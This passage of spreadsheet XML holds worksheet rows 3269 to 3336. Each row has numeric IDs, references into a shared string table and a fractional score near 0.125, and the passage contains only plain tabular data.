      <c r="A3269" s="1">
        <v>4199.0</v>
      </c>
      <c r="B3269" s="2">
        <v>4.1641506E7</v>
      </c>
      <c r="C3269" s="2" t="s">
        <v>3075</v>
      </c>
      <c r="D3269" s="2">
        <v>1.0</v>
      </c>
      <c r="E3269" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3269" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="3270" ht="15.75" customHeight="1">
      <c r="A3270" s="1">
        <v>918.0</v>
      </c>
      <c r="B3270" s="2">
        <v>2.223903E7</v>
      </c>
      <c r="C3270" s="2" t="s">
        <v>3076</v>
      </c>
      <c r="D3270" s="2">
        <v>1.0</v>
      </c>
      <c r="E3270" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3270" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="3271" ht="15.75" customHeight="1">
      <c r="A3271" s="1">
        <v>945.0</v>
      </c>
      <c r="B3271" s="2">
        <v>2.2554313E7</v>
      </c>
      <c r="C3271" s="2" t="s">
        <v>3077</v>
      </c>
      <c r="D3271" s="2">
        <v>1.0</v>
      </c>
      <c r="E3271" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3271" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="3272" ht="15.75" customHeight="1">
      <c r="A3272" s="1">
        <v>5232.0</v>
      </c>
      <c r="B3272" s="2">
        <v>4.5002708E7</v>
      </c>
      <c r="C3272" s="2" t="s">
        <v>3078</v>
      </c>
      <c r="D3272" s="2">
        <v>1.0</v>
      </c>
      <c r="E3272" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3272" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="3273" ht="15.75" customHeight="1">
      <c r="A3273" s="1">
        <v>5482.0</v>
      </c>
      <c r="B3273" s="2">
        <v>4.5745936E7</v>
      </c>
      <c r="C3273" s="2" t="s">
        <v>3079</v>
      </c>
      <c r="D3273" s="2">
        <v>1.0</v>
      </c>
      <c r="E3273" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3273" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="3274" ht="15.75" customHeight="1">
      <c r="A3274" s="1">
        <v>7597.0</v>
      </c>
      <c r="B3274" s="2">
        <v>5.1627934E7</v>
      </c>
      <c r="C3274" s="2" t="s">
        <v>3080</v>
      </c>
      <c r="D3274" s="2">
        <v>1.0</v>
      </c>
      <c r="E3274" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3274" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="3275" ht="15.75" customHeight="1">
      <c r="A3275" s="1">
        <v>10153.0</v>
      </c>
      <c r="B3275" s="2">
        <v>5.7315039E7</v>
      </c>
      <c r="C3275" s="2" t="s">
        <v>3081</v>
      </c>
      <c r="D3275" s="2">
        <v>1.0</v>
      </c>
      <c r="E3275" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3275" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="3276" ht="15.75" customHeight="1">
      <c r="A3276" s="1">
        <v>12143.0</v>
      </c>
      <c r="B3276" s="2">
        <v>2.7099933E7</v>
      </c>
      <c r="C3276" s="2" t="s">
        <v>3082</v>
      </c>
      <c r="D3276" s="2">
        <v>1.0</v>
      </c>
      <c r="E3276" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3276" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="3277" ht="15.75" customHeight="1">
      <c r="A3277" s="1">
        <v>18211.0</v>
      </c>
      <c r="B3277" s="2">
        <v>5.2066782E7</v>
      </c>
      <c r="C3277" s="2" t="s">
        <v>3083</v>
      </c>
      <c r="D3277" s="2">
        <v>1.0</v>
      </c>
      <c r="E3277" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3277" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="3278" ht="15.75" customHeight="1">
      <c r="A3278" s="1">
        <v>22227.0</v>
      </c>
      <c r="B3278" s="2">
        <v>3.236443E7</v>
      </c>
      <c r="C3278" s="2" t="s">
        <v>3084</v>
      </c>
      <c r="D3278" s="2">
        <v>1.0</v>
      </c>
      <c r="E3278" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3278" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="3279" ht="15.75" customHeight="1">
      <c r="A3279" s="1">
        <v>23270.0</v>
      </c>
      <c r="B3279" s="2">
        <v>5.3411539E7</v>
      </c>
      <c r="C3279" s="2" t="s">
        <v>3084</v>
      </c>
      <c r="D3279" s="2">
        <v>1.0</v>
      </c>
      <c r="E3279" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3279" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="3280" ht="15.75" customHeight="1">
      <c r="A3280" s="1">
        <v>23.0</v>
      </c>
      <c r="B3280" s="2">
        <v>1.0472514E7</v>
      </c>
      <c r="C3280" s="2" t="s">
        <v>3085</v>
      </c>
      <c r="D3280" s="2">
        <v>1.0</v>
      </c>
      <c r="E3280" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3280" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3281" ht="15.75" customHeight="1">
      <c r="A3281" s="1">
        <v>529.0</v>
      </c>
      <c r="B3281" s="2">
        <v>1.850251E7</v>
      </c>
      <c r="C3281" s="2" t="s">
        <v>3086</v>
      </c>
      <c r="D3281" s="2">
        <v>1.0</v>
      </c>
      <c r="E3281" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3281" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3282" ht="15.75" customHeight="1">
      <c r="A3282" s="1">
        <v>1800.0</v>
      </c>
      <c r="B3282" s="2">
        <v>2.9134786E7</v>
      </c>
      <c r="C3282" s="2" t="s">
        <v>3087</v>
      </c>
      <c r="D3282" s="2">
        <v>1.0</v>
      </c>
      <c r="E3282" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3282" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3283" ht="15.75" customHeight="1">
      <c r="A3283" s="1">
        <v>1804.0</v>
      </c>
      <c r="B3283" s="2">
        <v>2.9143746E7</v>
      </c>
      <c r="C3283" s="2" t="s">
        <v>3088</v>
      </c>
      <c r="D3283" s="2">
        <v>1.0</v>
      </c>
      <c r="E3283" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3283" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3284" ht="15.75" customHeight="1">
      <c r="A3284" s="1">
        <v>1916.0</v>
      </c>
      <c r="B3284" s="2">
        <v>3.0035885E7</v>
      </c>
      <c r="C3284" s="2" t="s">
        <v>3089</v>
      </c>
      <c r="D3284" s="2">
        <v>1.0</v>
      </c>
      <c r="E3284" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3284" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3285" ht="15.75" customHeight="1">
      <c r="A3285" s="1">
        <v>2365.0</v>
      </c>
      <c r="B3285" s="2">
        <v>3.3241019E7</v>
      </c>
      <c r="C3285" s="2" t="s">
        <v>3090</v>
      </c>
      <c r="D3285" s="2">
        <v>1.0</v>
      </c>
      <c r="E3285" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3285" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3286" ht="15.75" customHeight="1">
      <c r="A3286" s="1">
        <v>2457.0</v>
      </c>
      <c r="B3286" s="2">
        <v>3.3729668E7</v>
      </c>
      <c r="C3286" s="2" t="s">
        <v>3091</v>
      </c>
      <c r="D3286" s="2">
        <v>1.0</v>
      </c>
      <c r="E3286" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3286" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3287" ht="15.75" customHeight="1">
      <c r="A3287" s="1">
        <v>2919.0</v>
      </c>
      <c r="B3287" s="2">
        <v>3.583791E7</v>
      </c>
      <c r="C3287" s="2" t="s">
        <v>3092</v>
      </c>
      <c r="D3287" s="2">
        <v>1.0</v>
      </c>
      <c r="E3287" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3287" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3288" ht="15.75" customHeight="1">
      <c r="A3288" s="1">
        <v>3185.0</v>
      </c>
      <c r="B3288" s="2">
        <v>3.71627E7</v>
      </c>
      <c r="C3288" s="2" t="s">
        <v>3093</v>
      </c>
      <c r="D3288" s="2">
        <v>1.0</v>
      </c>
      <c r="E3288" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3288" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3289" ht="15.75" customHeight="1">
      <c r="A3289" s="1">
        <v>3542.0</v>
      </c>
      <c r="B3289" s="2">
        <v>3.8705561E7</v>
      </c>
      <c r="C3289" s="2" t="s">
        <v>3094</v>
      </c>
      <c r="D3289" s="2">
        <v>1.0</v>
      </c>
      <c r="E3289" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3289" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3290" ht="15.75" customHeight="1">
      <c r="A3290" s="1">
        <v>4147.0</v>
      </c>
      <c r="B3290" s="2">
        <v>4.1420065E7</v>
      </c>
      <c r="C3290" s="2" t="s">
        <v>3095</v>
      </c>
      <c r="D3290" s="2">
        <v>1.0</v>
      </c>
      <c r="E3290" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3290" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3291" ht="15.75" customHeight="1">
      <c r="A3291" s="1">
        <v>4920.0</v>
      </c>
      <c r="B3291" s="2">
        <v>4.3960978E7</v>
      </c>
      <c r="C3291" s="2" t="s">
        <v>3096</v>
      </c>
      <c r="D3291" s="2">
        <v>1.0</v>
      </c>
      <c r="E3291" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3291" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3292" ht="15.75" customHeight="1">
      <c r="A3292" s="1">
        <v>7447.0</v>
      </c>
      <c r="B3292" s="2">
        <v>5122670.0</v>
      </c>
      <c r="C3292" s="2" t="s">
        <v>3097</v>
      </c>
      <c r="D3292" s="2">
        <v>1.0</v>
      </c>
      <c r="E3292" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3292" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3293" ht="15.75" customHeight="1">
      <c r="A3293" s="1">
        <v>7780.0</v>
      </c>
      <c r="B3293" s="2">
        <v>5.2180209E7</v>
      </c>
      <c r="C3293" s="2" t="s">
        <v>3098</v>
      </c>
      <c r="D3293" s="2">
        <v>1.0</v>
      </c>
      <c r="E3293" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3293" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3294" ht="15.75" customHeight="1">
      <c r="A3294" s="1">
        <v>7926.0</v>
      </c>
      <c r="B3294" s="2">
        <v>5.2564287E7</v>
      </c>
      <c r="C3294" s="2" t="s">
        <v>3099</v>
      </c>
      <c r="D3294" s="2">
        <v>1.0</v>
      </c>
      <c r="E3294" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3294" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3295" ht="15.75" customHeight="1">
      <c r="A3295" s="1">
        <v>8428.0</v>
      </c>
      <c r="B3295" s="2">
        <v>5.3938613E7</v>
      </c>
      <c r="C3295" s="2" t="s">
        <v>3100</v>
      </c>
      <c r="D3295" s="2">
        <v>1.0</v>
      </c>
      <c r="E3295" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3295" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3296" ht="15.75" customHeight="1">
      <c r="A3296" s="1">
        <v>8761.0</v>
      </c>
      <c r="B3296" s="2">
        <v>5.4575747E7</v>
      </c>
      <c r="C3296" s="2" t="s">
        <v>3101</v>
      </c>
      <c r="D3296" s="2">
        <v>1.0</v>
      </c>
      <c r="E3296" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3296" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3297" ht="15.75" customHeight="1">
      <c r="A3297" s="1">
        <v>9368.0</v>
      </c>
      <c r="B3297" s="2">
        <v>5.5689897E7</v>
      </c>
      <c r="C3297" s="2" t="s">
        <v>3102</v>
      </c>
      <c r="D3297" s="2">
        <v>1.0</v>
      </c>
      <c r="E3297" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3297" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3298" ht="15.75" customHeight="1">
      <c r="A3298" s="1">
        <v>9652.0</v>
      </c>
      <c r="B3298" s="2">
        <v>5.6270238E7</v>
      </c>
      <c r="C3298" s="2" t="s">
        <v>3103</v>
      </c>
      <c r="D3298" s="2">
        <v>1.0</v>
      </c>
      <c r="E3298" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3298" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3299" ht="15.75" customHeight="1">
      <c r="A3299" s="1">
        <v>10384.0</v>
      </c>
      <c r="B3299" s="2">
        <v>8358885.0</v>
      </c>
      <c r="C3299" s="2" t="s">
        <v>3104</v>
      </c>
      <c r="D3299" s="2">
        <v>1.0</v>
      </c>
      <c r="E3299" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3299" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3300" ht="15.75" customHeight="1">
      <c r="A3300" s="1">
        <v>10550.0</v>
      </c>
      <c r="B3300" s="2">
        <v>1.2635308E7</v>
      </c>
      <c r="C3300" s="2" t="s">
        <v>3105</v>
      </c>
      <c r="D3300" s="2">
        <v>1.0</v>
      </c>
      <c r="E3300" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3300" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3301" ht="15.75" customHeight="1">
      <c r="A3301" s="1">
        <v>10970.0</v>
      </c>
      <c r="B3301" s="2">
        <v>1.7276906E7</v>
      </c>
      <c r="C3301" s="2" t="s">
        <v>3106</v>
      </c>
      <c r="D3301" s="2">
        <v>1.0</v>
      </c>
      <c r="E3301" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3301" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3302" ht="15.75" customHeight="1">
      <c r="A3302" s="1">
        <v>11261.0</v>
      </c>
      <c r="B3302" s="2">
        <v>2.0650992E7</v>
      </c>
      <c r="C3302" s="2" t="s">
        <v>3107</v>
      </c>
      <c r="D3302" s="2">
        <v>1.0</v>
      </c>
      <c r="E3302" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3302" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3303" ht="15.75" customHeight="1">
      <c r="A3303" s="1">
        <v>11676.0</v>
      </c>
      <c r="B3303" s="2">
        <v>2.3432299E7</v>
      </c>
      <c r="C3303" s="2" t="s">
        <v>3108</v>
      </c>
      <c r="D3303" s="2">
        <v>1.0</v>
      </c>
      <c r="E3303" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3303" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3304" ht="15.75" customHeight="1">
      <c r="A3304" s="1">
        <v>11738.0</v>
      </c>
      <c r="B3304" s="2">
        <v>2.405194E7</v>
      </c>
      <c r="C3304" s="2" t="s">
        <v>3109</v>
      </c>
      <c r="D3304" s="2">
        <v>1.0</v>
      </c>
      <c r="E3304" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3304" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3305" ht="15.75" customHeight="1">
      <c r="A3305" s="1">
        <v>12229.0</v>
      </c>
      <c r="B3305" s="2">
        <v>2.7821875E7</v>
      </c>
      <c r="C3305" s="2" t="s">
        <v>3110</v>
      </c>
      <c r="D3305" s="2">
        <v>1.0</v>
      </c>
      <c r="E3305" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3305" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3306" ht="15.75" customHeight="1">
      <c r="A3306" s="1">
        <v>13032.0</v>
      </c>
      <c r="B3306" s="2">
        <v>3.2953993E7</v>
      </c>
      <c r="C3306" s="2" t="s">
        <v>3111</v>
      </c>
      <c r="D3306" s="2">
        <v>1.0</v>
      </c>
      <c r="E3306" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3306" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3307" ht="15.75" customHeight="1">
      <c r="A3307" s="1">
        <v>13035.0</v>
      </c>
      <c r="B3307" s="2">
        <v>3.2974887E7</v>
      </c>
      <c r="C3307" s="2" t="s">
        <v>3112</v>
      </c>
      <c r="D3307" s="2">
        <v>1.0</v>
      </c>
      <c r="E3307" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3307" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3308" ht="15.75" customHeight="1">
      <c r="A3308" s="1">
        <v>13993.0</v>
      </c>
      <c r="B3308" s="2">
        <v>3.7383221E7</v>
      </c>
      <c r="C3308" s="2" t="s">
        <v>3113</v>
      </c>
      <c r="D3308" s="2">
        <v>1.0</v>
      </c>
      <c r="E3308" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3308" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3309" ht="15.75" customHeight="1">
      <c r="A3309" s="1">
        <v>14325.0</v>
      </c>
      <c r="B3309" s="2">
        <v>3.873145E7</v>
      </c>
      <c r="C3309" s="2" t="s">
        <v>3114</v>
      </c>
      <c r="D3309" s="2">
        <v>1.0</v>
      </c>
      <c r="E3309" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3309" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3310" ht="15.75" customHeight="1">
      <c r="A3310" s="1">
        <v>14621.0</v>
      </c>
      <c r="B3310" s="2">
        <v>4.0293257E7</v>
      </c>
      <c r="C3310" s="2" t="s">
        <v>3115</v>
      </c>
      <c r="D3310" s="2">
        <v>1.0</v>
      </c>
      <c r="E3310" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3310" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3311" ht="15.75" customHeight="1">
      <c r="A3311" s="1">
        <v>14626.0</v>
      </c>
      <c r="B3311" s="2">
        <v>4.0304769E7</v>
      </c>
      <c r="C3311" s="2" t="s">
        <v>3116</v>
      </c>
      <c r="D3311" s="2">
        <v>1.0</v>
      </c>
      <c r="E3311" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3311" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3312" ht="15.75" customHeight="1">
      <c r="A3312" s="1">
        <v>15267.0</v>
      </c>
      <c r="B3312" s="2">
        <v>4.2337536E7</v>
      </c>
      <c r="C3312" s="2" t="s">
        <v>3117</v>
      </c>
      <c r="D3312" s="2">
        <v>1.0</v>
      </c>
      <c r="E3312" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3312" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3313" ht="15.75" customHeight="1">
      <c r="A3313" s="1">
        <v>16750.0</v>
      </c>
      <c r="B3313" s="2">
        <v>4.7589707E7</v>
      </c>
      <c r="C3313" s="2" t="s">
        <v>3118</v>
      </c>
      <c r="D3313" s="2">
        <v>1.0</v>
      </c>
      <c r="E3313" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3313" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3314" ht="15.75" customHeight="1">
      <c r="A3314" s="1">
        <v>18042.0</v>
      </c>
      <c r="B3314" s="2">
        <v>5.1560341E7</v>
      </c>
      <c r="C3314" s="2" t="s">
        <v>3119</v>
      </c>
      <c r="D3314" s="2">
        <v>1.0</v>
      </c>
      <c r="E3314" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3314" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3315" ht="15.75" customHeight="1">
      <c r="A3315" s="1">
        <v>18044.0</v>
      </c>
      <c r="B3315" s="2">
        <v>5.1560341E7</v>
      </c>
      <c r="C3315" s="2" t="s">
        <v>3120</v>
      </c>
      <c r="D3315" s="2">
        <v>1.0</v>
      </c>
      <c r="E3315" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3315" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3316" ht="15.75" customHeight="1">
      <c r="A3316" s="1">
        <v>18767.0</v>
      </c>
      <c r="B3316" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C3316" s="2" t="s">
        <v>3121</v>
      </c>
      <c r="D3316" s="2">
        <v>1.0</v>
      </c>
      <c r="E3316" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3316" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3317" ht="15.75" customHeight="1">
      <c r="A3317" s="1">
        <v>19730.0</v>
      </c>
      <c r="B3317" s="2">
        <v>5.6624518E7</v>
      </c>
      <c r="C3317" s="2" t="s">
        <v>3122</v>
      </c>
      <c r="D3317" s="2">
        <v>1.0</v>
      </c>
      <c r="E3317" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3317" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3318" ht="15.75" customHeight="1">
      <c r="A3318" s="1">
        <v>19873.0</v>
      </c>
      <c r="B3318" s="2">
        <v>5.7246276E7</v>
      </c>
      <c r="C3318" s="2" t="s">
        <v>3123</v>
      </c>
      <c r="D3318" s="2">
        <v>1.0</v>
      </c>
      <c r="E3318" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3318" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3319" ht="15.75" customHeight="1">
      <c r="A3319" s="1">
        <v>20084.0</v>
      </c>
      <c r="B3319" s="2">
        <v>9302992.0</v>
      </c>
      <c r="C3319" s="2" t="s">
        <v>3124</v>
      </c>
      <c r="D3319" s="2">
        <v>1.0</v>
      </c>
      <c r="E3319" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3319" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3320" ht="15.75" customHeight="1">
      <c r="A3320" s="1">
        <v>24105.0</v>
      </c>
      <c r="B3320" s="2">
        <v>9849858.0</v>
      </c>
      <c r="C3320" s="2" t="s">
        <v>3125</v>
      </c>
      <c r="D3320" s="2">
        <v>1.0</v>
      </c>
      <c r="E3320" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3320" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="3321" ht="15.75" customHeight="1">
      <c r="A3321" s="1">
        <v>6622.0</v>
      </c>
      <c r="B3321" s="2">
        <v>4.9056012E7</v>
      </c>
      <c r="C3321" s="2" t="s">
        <v>3126</v>
      </c>
      <c r="D3321" s="2">
        <v>1.0</v>
      </c>
      <c r="E3321" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3321" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="3322" ht="15.75" customHeight="1">
      <c r="A3322" s="1">
        <v>3261.0</v>
      </c>
      <c r="B3322" s="2">
        <v>3.7441537E7</v>
      </c>
      <c r="C3322" s="2" t="s">
        <v>3127</v>
      </c>
      <c r="D3322" s="2">
        <v>1.0</v>
      </c>
      <c r="E3322" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3322" s="2">
        <v>0.1254789272030652</v>
      </c>
    </row>
    <row r="3323" ht="15.75" customHeight="1">
      <c r="A3323" s="1">
        <v>12531.0</v>
      </c>
      <c r="B3323" s="2">
        <v>2.9797834E7</v>
      </c>
      <c r="C3323" s="2" t="s">
        <v>3128</v>
      </c>
      <c r="D3323" s="2">
        <v>1.0</v>
      </c>
      <c r="E3323" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3323" s="2">
        <v>0.1254789272030652</v>
      </c>
    </row>
    <row r="3324" ht="15.75" customHeight="1">
      <c r="A3324" s="1">
        <v>1029.0</v>
      </c>
      <c r="B3324" s="2">
        <v>2.3180755E7</v>
      </c>
      <c r="C3324" s="2" t="s">
        <v>3129</v>
      </c>
      <c r="D3324" s="2">
        <v>1.0</v>
      </c>
      <c r="E3324" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3324" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="3325" ht="15.75" customHeight="1">
      <c r="A3325" s="1">
        <v>2511.0</v>
      </c>
      <c r="B3325" s="2">
        <v>3.3981986E7</v>
      </c>
      <c r="C3325" s="2" t="s">
        <v>3130</v>
      </c>
      <c r="D3325" s="2">
        <v>1.0</v>
      </c>
      <c r="E3325" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3325" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="3326" ht="15.75" customHeight="1">
      <c r="A3326" s="1">
        <v>3642.0</v>
      </c>
      <c r="B3326" s="2">
        <v>3.9283139E7</v>
      </c>
      <c r="C3326" s="2" t="s">
        <v>3131</v>
      </c>
      <c r="D3326" s="2">
        <v>1.0</v>
      </c>
      <c r="E3326" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3326" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="3327" ht="15.75" customHeight="1">
      <c r="A3327" s="1">
        <v>5591.0</v>
      </c>
      <c r="B3327" s="2">
        <v>4.6098272E7</v>
      </c>
      <c r="C3327" s="2" t="s">
        <v>3132</v>
      </c>
      <c r="D3327" s="2">
        <v>1.0</v>
      </c>
      <c r="E3327" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3327" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="3328" ht="15.75" customHeight="1">
      <c r="A3328" s="1">
        <v>10436.0</v>
      </c>
      <c r="B3328" s="2">
        <v>1.0351742E7</v>
      </c>
      <c r="C3328" s="2" t="s">
        <v>3133</v>
      </c>
      <c r="D3328" s="2">
        <v>1.0</v>
      </c>
      <c r="E3328" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3328" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="3329" ht="15.75" customHeight="1">
      <c r="A3329" s="1">
        <v>15490.0</v>
      </c>
      <c r="B3329" s="2">
        <v>4.3197587E7</v>
      </c>
      <c r="C3329" s="2" t="s">
        <v>3134</v>
      </c>
      <c r="D3329" s="2">
        <v>1.0</v>
      </c>
      <c r="E3329" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3329" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="3330" ht="15.75" customHeight="1">
      <c r="A3330" s="1">
        <v>18703.0</v>
      </c>
      <c r="B3330" s="2">
        <v>5.3629785E7</v>
      </c>
      <c r="C3330" s="2" t="s">
        <v>3135</v>
      </c>
      <c r="D3330" s="2">
        <v>1.0</v>
      </c>
      <c r="E3330" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3330" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="3331" ht="15.75" customHeight="1">
      <c r="A3331" s="1">
        <v>14280.0</v>
      </c>
      <c r="B3331" s="2">
        <v>3.8467923E7</v>
      </c>
      <c r="C3331" s="2" t="s">
        <v>3136</v>
      </c>
      <c r="D3331" s="2">
        <v>1.0</v>
      </c>
      <c r="E3331" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3331" s="2">
        <v>0.1252072968490879</v>
      </c>
    </row>
    <row r="3332" ht="15.75" customHeight="1">
      <c r="A3332" s="1">
        <v>6485.0</v>
      </c>
      <c r="B3332" s="2">
        <v>4.8671664E7</v>
      </c>
      <c r="C3332" s="2" t="s">
        <v>3137</v>
      </c>
      <c r="D3332" s="2">
        <v>1.0</v>
      </c>
      <c r="E3332" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3332" s="2">
        <v>0.1250000000000001</v>
      </c>
    </row>
    <row r="3333" ht="15.75" customHeight="1">
      <c r="A3333" s="1">
        <v>88.0</v>
      </c>
      <c r="B3333" s="2">
        <v>1.2023328E7</v>
      </c>
      <c r="C3333" s="2" t="s">
        <v>3138</v>
      </c>
      <c r="D3333" s="2">
        <v>1.0</v>
      </c>
      <c r="E3333" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3333" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="3334" ht="15.75" customHeight="1">
      <c r="A3334" s="1">
        <v>780.0</v>
      </c>
      <c r="B3334" s="2">
        <v>2.1121772E7</v>
      </c>
      <c r="C3334" s="2" t="s">
        <v>3139</v>
      </c>
      <c r="D3334" s="2">
        <v>1.0</v>
      </c>
      <c r="E3334" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3334" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="3335" ht="15.75" customHeight="1">
      <c r="A3335" s="1">
        <v>1685.0</v>
      </c>
      <c r="B3335" s="2">
        <v>2.8427512E7</v>
      </c>
      <c r="C3335" s="2" t="s">
        <v>3140</v>
      </c>
      <c r="D3335" s="2">
        <v>1.0</v>
      </c>
      <c r="E3335" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3335" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="3336" ht="15.75" customHeight="1">
      <c r="A3336" s="1">
        <v>5961.0</v>
